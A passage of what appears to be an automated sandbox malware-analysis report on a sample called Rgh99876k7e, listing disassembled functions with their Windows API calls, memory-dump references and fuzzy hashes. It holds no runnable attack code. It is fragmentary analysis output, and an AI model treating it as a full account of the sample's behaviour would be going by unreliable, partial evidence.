                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                          • String ID:
                          • API String ID: 1414292761-0
                          • Opcode ID: 90b84c0a9d980d9d241e895d4ca23acb296a52b3b6842c400f5e3f8fb42a724f
                          • Instruction ID: d9c8d0e5bf1051d087a67660d5a8bdae5570f6c3b319a5135b9124d3c1324dd0
                          • Opcode Fuzzy Hash: 90b84c0a9d980d9d241e895d4ca23acb296a52b3b6842c400f5e3f8fb42a724f
                          • Instruction Fuzzy Hash: F651B172A00216BBFB258F64DC85EBF77A9EB44750F158629FD05D6142EB3CDC50C6A0
                          Function 0078BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                            • Part of subcall function 0078C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0078B6AE,?,?), ref: 0078C9B5
                            • Part of subcall function 0078C998: _wcslen.LIBCMT ref: 0078C9F1
                            • Part of subcall function 0078C998: _wcslen.LIBCMT ref: 0078CA68
                            • Part of subcall function 0078C998: _wcslen.LIBCMT ref: 0078CA9E
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0078BCCA
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0078BD25
                          • RegCloseKey.ADVAPI32(00000000), ref: 0078BD6A
                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0078BD99
                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0078BDF3
                          • RegCloseKey.ADVAPI32(?), ref: 0078BDFF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                          • String ID:
                          • API String ID: 1120388591-0
                          • Opcode ID: 553eb15116119e4e62edb638d2521891567073a4997abe79ca1ea446b711fd89
                          • Instruction ID: 6d18fa8932a413a3be7c7e7d94228a518c1b610c877ba96e9c62181508782ecc
                          • Opcode Fuzzy Hash: 553eb15116119e4e62edb638d2521891567073a4997abe79ca1ea446b711fd89
                          • Instruction Fuzzy Hash: 5281B230208241EFD714EF24C895E6ABBE5FF84308F14855DF5598B2A2DB39ED45CBA2
                          Function 0075F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VariantInit.OLEAUT32(00000035), ref: 0075F7B9
                          • SysAllocString.OLEAUT32(00000001), ref: 0075F860
                          • VariantCopy.OLEAUT32(0075FA64,00000000), ref: 0075F889
                          • VariantClear.OLEAUT32(0075FA64), ref: 0075F8AD
                          • VariantCopy.OLEAUT32(0075FA64,00000000), ref: 0075F8B1
                          • VariantClear.OLEAUT32(?), ref: 0075F8BB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Variant$ClearCopy$AllocInitString
                          • String ID:
                          • API String ID: 3859894641-0
                          • Opcode ID: d911f466af9e8a218df2a4947b60d26ef3d080f7442f8a00d0af01eec8266668
                          • Instruction ID: 5565539649abc9bf2d22ad0ebf0d18e5d4d20376a0cbb10e26fa8dac9c3d50f1
                          • Opcode Fuzzy Hash: d911f466af9e8a218df2a4947b60d26ef3d080f7442f8a00d0af01eec8266668
                          • Instruction Fuzzy Hash: CE51E831601310FACF10AB65D899BA9B3E8EF45312F248467ED45DF2D1DBB8AC84C796
                          Function 0077910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00707620: _wcslen.LIBCMT ref: 00707625
                            • Part of subcall function 00706B57: _wcslen.LIBCMT ref: 00706B6A
                          • GetOpenFileNameW.COMDLG32(00000058), ref: 007794E5
                          • _wcslen.LIBCMT ref: 00779506
                          • _wcslen.LIBCMT ref: 0077952D
                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00779585
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _wcslen$FileName$OpenSave
                          • String ID: X
                          • API String ID: 83654149-3081909835
                          • Opcode ID: 81ca85133f4e6c6ee3cb7840e144ad321fb42bfa77245ad8a04ad5114cd3365f
                          • Instruction ID: d974e8d1780ec404b7920d6d96468ae27e48f6dff18a3ba945ecc4807c86ab68
                          • Opcode Fuzzy Hash: 81ca85133f4e6c6ee3cb7840e144ad321fb42bfa77245ad8a04ad5114cd3365f
                          • Instruction Fuzzy Hash: DAE1C431604350DFDB24DF24C885A6AB7E0BF85354F048A6DF9899B2E2DB38DD05CB92
                          Function 0071920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00719BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00719BB2
                          • BeginPaint.USER32(?,?,?), ref: 00719241
                          • GetWindowRect.USER32(?,?), ref: 007192A5
                          • ScreenToClient.USER32(?,?), ref: 007192C2
                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 007192D3
                          • EndPaint.USER32(?,?,?,?,?), ref: 00719321
                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 007571EA
                            • Part of subcall function 00719339: BeginPath.GDI32(00000000), ref: 00719357
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                          • String ID:
                          • API String ID: 3050599898-0
                          • Opcode ID: 4d84b3d2424dd0e1a8f5cb0bbf734697505f38fae1cd51f47c924cfdb2110b6e
                          • Instruction ID: 56df12ed9ca4c82dd0d65376ca06ceda6a834c079c1fd467784d0a523645438b
                          • Opcode Fuzzy Hash: 4d84b3d2424dd0e1a8f5cb0bbf734697505f38fae1cd51f47c924cfdb2110b6e
                          • Instruction Fuzzy Hash: 2641B370105240EFD711DF58DCA4FF67BB8EB45321F14422AFAA4871E1C7789886DB65
                          Function 007707EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                          Download Yara Rule
                          APIs
                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 0077080C
                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00770847
                          • EnterCriticalSection.KERNEL32(?), ref: 00770863
                          • LeaveCriticalSection.KERNEL32(?), ref: 007708DC
                          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 007708F3
                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00770921
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                          • String ID:
                          • API String ID: 3368777196-0
                          • Opcode ID: 5ab97ea4ae348b5372c5e04aff8cc1c40ca0a48c598229ea6edf01f4d3f911c9
                          • Instruction ID: bb4bdd6a8a173c97b234023063f12c580b4aef09ad7ede118cfdea3672f8fc90
                          • Opcode Fuzzy Hash: 5ab97ea4ae348b5372c5e04aff8cc1c40ca0a48c598229ea6edf01f4d3f911c9
                          • Instruction Fuzzy Hash: 1B415C71A00205EFDF15EF54DC85AAA77B8FF04310F1480A9ED049A297D738EE65DBA4
                          Function 007981DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                          Download Yara Rule
                          APIs
                          • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0075F3AB,00000000,?,?,00000000,?,0075682C,00000004,00000000,00000000), ref: 0079824C
                          • EnableWindow.USER32(00000000,00000000), ref: 00798272
                          • ShowWindow.USER32(FFFFFFFF,00000000), ref: 007982D1
                          • ShowWindow.USER32(00000000,00000004), ref: 007982E5
                          • EnableWindow.USER32(00000000,00000001), ref: 0079830B
                          • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0079832F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$Show$Enable$MessageSend
                          • String ID:
                          • API String ID: 642888154-0
                          • Opcode ID: 89d1396c738004f2dd45a62f3f7ca55878cd1836bbb76e5f52ce8fba50bc6805
                          • Instruction ID: 407f7fea6b35387b86a355555ce0b670fb6ba5e37e71631ef82267d6e3b88e55
                          • Opcode Fuzzy Hash: 89d1396c738004f2dd45a62f3f7ca55878cd1836bbb76e5f52ce8fba50bc6805
                          • Instruction Fuzzy Hash: 65419434601644AFDF51CF15E899BE87BF0FB0B714F5881AAE5084B262CB39A841CB56
                          Function 00764C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                          Download Yara Rule
                          APIs
                          • IsWindowVisible.USER32(?), ref: 00764C95
                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00764CB2
                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00764CEA
                          • _wcslen.LIBCMT ref: 00764D08
                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00764D10
                          • _wcsstr.LIBVCRUNTIME ref: 00764D1A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                          • String ID:
                          • API String ID: 72514467-0
                          • Opcode ID: a9c46c63cfcf355e67ab1e73e44e9ec546ba49094ead8f53906c460193128842
                          • Instruction ID: 97454028e098968245f55b230efc7516e7fd3b821eb3ba67cc52241c2cee1987
                          • Opcode Fuzzy Hash: a9c46c63cfcf355e67ab1e73e44e9ec546ba49094ead8f53906c460193128842
                          • Instruction Fuzzy Hash: 2121F332704210BBEB265B39EC49E7B7BACDF45750F10806AFD06CA192EB69DC4196A0
                          Function 0077581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00703AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00703A97,?,?,00702E7F,?,?,?,00000000), ref: 00703AC2
                          • _wcslen.LIBCMT ref: 0077587B
                          • CoInitialize.OLE32(00000000), ref: 00775995
                          • CoCreateInstance.OLE32(0079FCF8,00000000,00000001,0079FB68,?), ref: 007759AE
                          • CoUninitialize.OLE32 ref: 007759CC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                          • String ID: .lnk
                          • API String ID: 3172280962-24824748
                          • Opcode ID: 19e46013ea3783cf3b05d0eba529d660b78f2b8c294cf735a7f135c8d2b73cb3
                          • Instruction ID: 11c33e7273a53026254e740be4bb7da2dc650ad7e79da33a0d0630fff12abf46
                          • Opcode Fuzzy Hash: 19e46013ea3783cf3b05d0eba529d660b78f2b8c294cf735a7f135c8d2b73cb3
                          • Instruction Fuzzy Hash: CCD163B1A04701DFCB14DF24C484A2ABBE1EF89350F14895DF9899B3A1DB79EC45CB92
                          Function 0076175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00760FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00760FCA
                            • Part of subcall function 00760FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00760FD6
                            • Part of subcall function 00760FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00760FE5
                            • Part of subcall function 00760FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00760FEC
                            • Part of subcall function 00760FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00761002
                          • GetLengthSid.ADVAPI32(?,00000000,00761335), ref: 007617AE
                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007617BA
                          • HeapAlloc.KERNEL32(00000000), ref: 007617C1
                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 007617DA
                          • GetProcessHeap.KERNEL32(00000000,00000000,00761335), ref: 007617EE
                          • HeapFree.KERNEL32(00000000), ref: 007617F5
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                          • String ID:
                          • API String ID: 3008561057-0
                          • Opcode ID: 2c20050508ca7b0c80630b283c96d51d1287d2a628941cb26a1a203749ff3a2b
                          • Instruction ID: 5213d4793366b110f0b25e9372ea799a642beb10719dfe412cfa7b78f3822b2b
                          • Opcode Fuzzy Hash: 2c20050508ca7b0c80630b283c96d51d1287d2a628941cb26a1a203749ff3a2b
                          • Instruction Fuzzy Hash: 1411BE71500205FFDF119FA4CC49BAF7BA9EB41355F588019F94297210D739AE41CB64
                          Function 007614CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007614FF
                          • OpenProcessToken.ADVAPI32(00000000), ref: 00761506
                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00761515
                          • CloseHandle.KERNEL32(00000004), ref: 00761520
                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0076154F
                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00761563
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                          • String ID:
                          • API String ID: 1413079979-0
                          • Opcode ID: d32a70bebcfc64bf3461ff22acc68f02ede3618ac6637f1a8fd8a4b5ce7b4415
                          • Instruction ID: 7d59601543f1b1d99510cac231e939e9087775130abacad5c2d3f0704c9f3387
                          • Opcode Fuzzy Hash: d32a70bebcfc64bf3461ff22acc68f02ede3618ac6637f1a8fd8a4b5ce7b4415
                          • Instruction Fuzzy Hash: A3113D7250124DABDF128F98DE49FDE7BA9EF48744F088015FE06A2060C379CE61DB61
                          Function 00723382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(?,?,00723379,00722FE5), ref: 00723390
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0072339E
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007233B7
                          • SetLastError.KERNEL32(00000000,?,00723379,00722FE5), ref: 00723409
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          • API String ID: 3852720340-0
                          • Opcode ID: c230f303aca3d5d82eb88de68fd9ead50e583bcb6f9c4060081873754f551728
                          • Instruction ID: be46d0e75deed71e325f3e8d248f1fce419adb7b127fba33f0f5c54b3a735b41
                          • Opcode Fuzzy Hash: c230f303aca3d5d82eb88de68fd9ead50e583bcb6f9c4060081873754f551728
                          • Instruction Fuzzy Hash: 8801F733609331FEAA2637747C89A672B98EB05779720422EF414952F2EF1D4E435558
                          Function 00732D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(?,?,00735686,00743CD6,?,00000000,?,00735B6A,?,?,?,?,?,0072E6D1,?,007C8A48), ref: 00732D78
                          • _free.LIBCMT ref: 00732DAB
                          • _free.LIBCMT ref: 00732DD3
                          • SetLastError.KERNEL32(00000000,?,?,?,?,0072E6D1,?,007C8A48,00000010,00704F4A,?,?,00000000,00743CD6), ref: 00732DE0
                          • SetLastError.KERNEL32(00000000,?,?,?,?,0072E6D1,?,007C8A48,00000010,00704F4A,?,?,00000000,00743CD6), ref: 00732DEC
                          • _abort.LIBCMT ref: 00732DF2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ErrorLast$_free$_abort
                          • String ID:
                          • API String ID: 3160817290-0
                          • Opcode ID: d6d7767a4fbb80ade0cf1319ef5a453be62e8b23c864b17eed9638483bc62f97
                          • Instruction ID: 1b9755485af8650596ba34cc85440ed39ced5074ffb4dce5cff8a3a7354cc55f
                          • Opcode Fuzzy Hash: d6d7767a4fbb80ade0cf1319ef5a453be62e8b23c864b17eed9638483bc62f97
                          • Instruction Fuzzy Hash: C4F0C832715610BBF6232735BC0EF5B2659BFC27A1F244419F824922E3EE2C98035165
                          Function 00798A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00719639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00719693
                            • Part of subcall function 00719639: SelectObject.GDI32(?,00000000), ref: 007196A2
                            • Part of subcall function 00719639: BeginPath.GDI32(?), ref: 007196B9
                            • Part of subcall function 00719639: SelectObject.GDI32(?,00000000), ref: 007196E2
                          • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00798A4E
                          • LineTo.GDI32(?,00000003,00000000), ref: 00798A62
                          • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00798A70
                          • LineTo.GDI32(?,00000000,00000003), ref: 00798A80
                          • EndPath.GDI32(?), ref: 00798A90
                          • StrokePath.GDI32(?), ref: 00798AA0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                          • String ID:
                          • API String ID: 43455801-0
                          • Opcode ID: ae3ed36d7934cc163eb4260cc421cbec027101942e03232d7edf9d6447b3d875
                          • Instruction ID: 29eb0e3057634865623936a96a0ae6194d9ede7b77436b838964737012db2e52
                          • Opcode Fuzzy Hash: ae3ed36d7934cc163eb4260cc421cbec027101942e03232d7edf9d6447b3d875
                          • Instruction Fuzzy Hash: 9F11097604014CFFDF129F94EC88EAA7F6DEB08350F00C012FA199A1A1C775AD56DBA4
                          Function 007651FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                          Download Yara Rule
                          APIs
                          • GetDC.USER32(00000000), ref: 00765218
                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00765229
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00765230
                          • ReleaseDC.USER32(00000000,00000000), ref: 00765238
                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0076524F
                          • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00765261
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CapsDevice$Release
                          • String ID:
                          • API String ID: 1035833867-0
                          • Opcode ID: ba13d27a22dab09da9471b2897ee73c322d4bb1e817b3e08369e221b5e315fb5
                          • Instruction ID: 255f6acba5fbaf3c5c922ff5e7a0503f12f3fe54337e194754428a26dddb3f00
                          • Opcode Fuzzy Hash: ba13d27a22dab09da9471b2897ee73c322d4bb1e817b3e08369e221b5e315fb5
                          • Instruction Fuzzy Hash: F0018FB5A00708BBEF119BA59C49A4EBFB8FB48351F048066FA05A7280D6749801CBA4
